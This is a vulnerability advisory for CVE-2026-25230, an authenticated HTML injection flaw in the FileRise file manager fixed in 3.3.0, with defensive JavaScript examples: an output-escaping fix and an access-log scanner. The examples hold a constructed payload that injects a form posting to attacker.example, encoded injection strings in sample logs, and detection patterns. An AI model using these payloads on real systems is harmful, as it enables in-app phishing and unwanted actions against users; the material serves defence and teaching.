
CVE-2026-25230: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in error311 FileRise

Severity: Medium
Tags: Vulnerability, CVE-2026-25230, CWE-79, CWE-116
Published: Mon Feb 09 2026 (02/09/2026, 18:32:09 UTC)
Source: CVE Database V5
Vendor/Project: error311
Product: FileRise

Description

CVE-2026-25230 is a medium severity cross-site scripting (XSS) vulnerability, more precisely an HTML injection, affecting FileRise versions prior to 3.3.0. It allows an authenticated user to inject HTML elements into the web interface, modifying the DOM to include attacker-chosen forms or links that can redirect other users or trigger unwanted actions when they interact with them. Exploitation requires both authentication and user interaction, so the exposure is limited to users who already have access to the instance. The vulnerability does not compromise confidentiality, but it can affect integrity and availability by manipulating the web interface. The issue is fixed in FileRise 3.3.0. European organizations running vulnerable versions should prioritize the upgrade and enforce strict access controls in the meantime.

AI-Powered Analysis

AI analysis last updated: 02/17/2026, 09:43:02 UTC

Technical Analysis

CVE-2026-25230 is an HTML injection vulnerability classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-116 (Improper Encoding or Escaping of Output); the second CWE points at the root cause, user-supplied values being written into the page without HTML encoding. It affects FileRise, a self-hosted web file manager and WebDAV server, in versions prior to 3.3.0. The vulnerability allows an authenticated user to inject arbitrary HTML elements into the Document Object Model (DOM) of the web interface. This can include form elements that submit to backend endpoints or link elements that redirect users when clicked. Because exploitation requires authentication and a victim's interaction, it is limited to users who already have some level of access to the system. The injected content can be used to manipulate the user interface, enabling phishing inside the application or causing other users to issue unintended requests. The CVSS v3.1 base score is 4.6 (medium severity), reflecting the limited scope and impact. The vulnerability was publicly disclosed on February 9, 2026, and has been addressed in FileRise version 3.3.0. No known exploits are reported in the wild at this time.
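To make the CWE-116 root cause concrete, the following is an added example written for this page; it is not FileRise code and makes no claim about where the project's own bug was. It assumes a file name (a hypothetical untrusted value) is interpolated into row markup that is later assigned to innerHTML, shows how a constructed payload breaks out of an attribute and plants a form, and shows the hardened renderer that encodes every interpolation so the same value can only ever become text. The payload, the attacker host and the template are constructed for the example.

```javascript
// Added example (not FileRise code): CWE-116 output-encoding failure
// turning an attacker-chosen string into live DOM, and the fix.

// Encode the five characters that matter in HTML text and in
// double- or single-quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable pattern: the untrusted value (assumed here to be a file
// name) is concatenated straight into markup destined for innerHTML.
function renderRowUnsafe(fileName) {
  return `<tr><td class="name" title="${fileName}">${fileName}</td></tr>`;
}

// Hardened pattern: every interpolation passes through escapeHtml, so the
// value cannot open new elements or attributes. In a browser the
// equivalent is building the row with createElement/textContent and
// setAttribute instead of string concatenation.
function renderRowSafe(fileName) {
  const safe = escapeHtml(fileName);
  return `<tr><td class="name" title="${safe}">${safe}</td></tr>`;
}

// Count start tags in a fragment: the safe renderer must never produce
// more than the two tags fixed in its template (<tr> and <td>).
function countTags(html) {
  return (html.match(/<[a-zA-Z][^>]*>/g) || []).length;
}

// Constructed payload: closes the title attribute, injects a form that
// posts to an attacker host, then re-opens a cell so the markup stays
// tidy. The host and endpoint are invented for the example.
const PAYLOAD =
  '"><form action="https://attacker.example/collect"><input name="p"></form><td x="';

// Tag count of the safe template on a benign name; used as the baseline.
const TEMPLATE_TAGS = countTags(renderRowSafe('report.pdf'));

// Render the payload both ways and report what each produced.
function demo() {
  const unsafe = renderRowUnsafe(PAYLOAD);
  const safe = renderRowSafe(PAYLOAD);
  return {
    unsafeTags: countTags(unsafe),
    safeTags: countTags(safe),
    unsafeHasForm: /<form\b/.test(unsafe),
    safeHasForm: /<form\b/.test(safe),
  };
}

console.log(demo());
```

The check worth carrying into a code review is the one `countTags` encodes: for a fixed template, the number of elements in the output must not depend on the input. Any renderer where it does is CWE-116 territory regardless of whether a `<script>` tag is involved, which is why a plain form or link, as in this CVE, is enough to matter.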

Potential Impact

For European organizations, this vulnerability poses a moderate risk primarily to the integrity and availability of the FileRise web interface. Since exploitation requires authenticated access, the threat is mostly internal or from compromised accounts. Attackers could manipulate the web interface to trick users into performing unintended actions, potentially leading to data manipulation or denial of service within the application. While confidentiality is not directly impacted, the altered interface could facilitate social engineering attacks or indirect data exposure. Organizations relying on FileRise for file management or WebDAV services could face operational disruptions or reduced trust in the system's integrity. The impact is heightened in environments with multiple users sharing access or where user privileges are not tightly controlled.

Mitigation Recommendations

European organizations should immediately upgrade all FileRise instances to version 3.3.0 or later to remediate this vulnerability. Until upgrades are completed, implement strict access controls to limit authenticated user privileges, ensuring only trusted users have write or administrative access. Employ web application firewalls (WAFs) with custom rules to detect and block suspicious HTML injection attempts. Conduct regular audits of user accounts and session activities to identify unusual behavior. Additionally, educate users about the risks of interacting with unexpected or suspicious interface elements, emphasizing caution with links and forms within the application. Consider network segmentation to isolate FileRise servers from broader enterprise networks, reducing the risk of lateral movement if an account is compromised.
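The WAF and audit advice above needs a concrete rule to be useful. Below is an added example, not FileRise or OffSeq code, of the kind of check one would run over web-server access logs (or port into a WAF rule) while waiting to upgrade: it URL-decodes query parameters, including double-encoded ones, and flags values that contain an HTML start tag, an inline event handler or a javascript: URL, attributing each hit to the authenticated user. The log lines, user names, paths and parameter names are constructed for the example and do not describe FileRise's real API.

```javascript
// Added example (not FileRise or OffSeq code): flag HTML-injection
// attempts in query-string parameters of access-log lines.

// Start tag, inline event handler, or javascript: URL. Requires a
// letter after '<' so values such as "a<3" are not flagged.
const TAG_RE = /<\s*\/?\s*[a-z][a-z0-9-]*|on[a-z]+\s*=|javascript\s*:/i;

// Decode up to two layers of percent-encoding; double encoding is the
// usual way past filters that decode once. Malformed sequences keep
// the value decoded so far instead of throwing.
function decodeLayers(value, layers = 2) {
  let out = value.replace(/\+/g, ' ');
  for (let i = 0; i < layers; i++) {
    try {
      const next = decodeURIComponent(out);
      if (next === out) break;
      out = next;
    } catch {
      break;
    }
  }
  return out;
}

// Combined-log-format fields we need (format assumed for the example).
const LINE_RE = /^(\S+) - (\S+) \[[^\]]+\] "(\S+) (\S+) HTTP\/[\d.]+" (\d{3})/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, user, method, target, status] = m;
  const q = target.indexOf('?');
  const params = [];
  if (q !== -1) {
    for (const pair of target.slice(q + 1).split('&')) {
      const eq = pair.indexOf('=');
      const key = eq === -1 ? pair : pair.slice(0, eq);
      const val = eq === -1 ? '' : pair.slice(eq + 1);
      params.push([decodeLayers(key), decodeLayers(val)]);
    }
  }
  return { ip, user, method, path: q === -1 ? target : target.slice(0, q), status, params };
}

// Return one hit per suspicious parameter value, with the user it came from.
function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    for (const [param, value] of rec.params) {
      if (TAG_RE.test(value)) hits.push({ user: rec.user, path: rec.path, param, value });
    }
  }
  return hits;
}

// Constructed sample log: one benign request, one single-encoded form
// injection, one double-encoded link injection, one benign value that
// merely contains '<', and one malformed line. Endpoints are invented.
const SAMPLE_LOG = [
  '10.0.0.5 - alice [09/Feb/2026:18:40:01 +0000] "GET /api/file/list?folder=Reports%2F2026 HTTP/1.1" 200',
  '10.0.0.9 - bob [09/Feb/2026:18:42:17 +0000] "GET /api/folder/rename?old=docs&new=%3Cform%20action%3D%22https%3A%2F%2Fattacker.example%22%3E HTTP/1.1" 200',
  '10.0.0.12 - carol [09/Feb/2026:18:45:20 +0000] "GET /api/folder/rename?old=q1&new=%253Ca%2520href%253D%2522https%253A%252F%252Fattacker.example%2522%253Ereport%253C%252Fa%253E HTTP/1.1" 200',
  '10.0.0.5 - alice [09/Feb/2026:18:47:03 +0000] "GET /api/file/list?folder=a%3C3 HTTP/1.1" 200',
  'malformed line with no request field',
];

console.log(scanAccessLog(SAMPLE_LOG));
```

Two caveats for anyone deploying this: it only sees query strings, so values sent in POST bodies or WebDAV requests need the same logic applied at a point where the body is visible (the WAF, or application-level request logging), and the `on[a-z]+=` clause will produce occasional false positives on ordinary values, so treat hits as triage input for the account audit the text recommends rather than as an automatic block.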


Technical Details

Data Version: 5.2
Assigner Short Name: GitHub_M
Date Reserved: 2026-01-30T14:44:47.328Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 698a36074b57a58fa16ab1c8

Added to database: 2/9/2026, 7:31:19 PM

Last enriched: 2/17/2026, 9:43:02 AM

Last updated: 2/21/2026, 2:19:19 AM

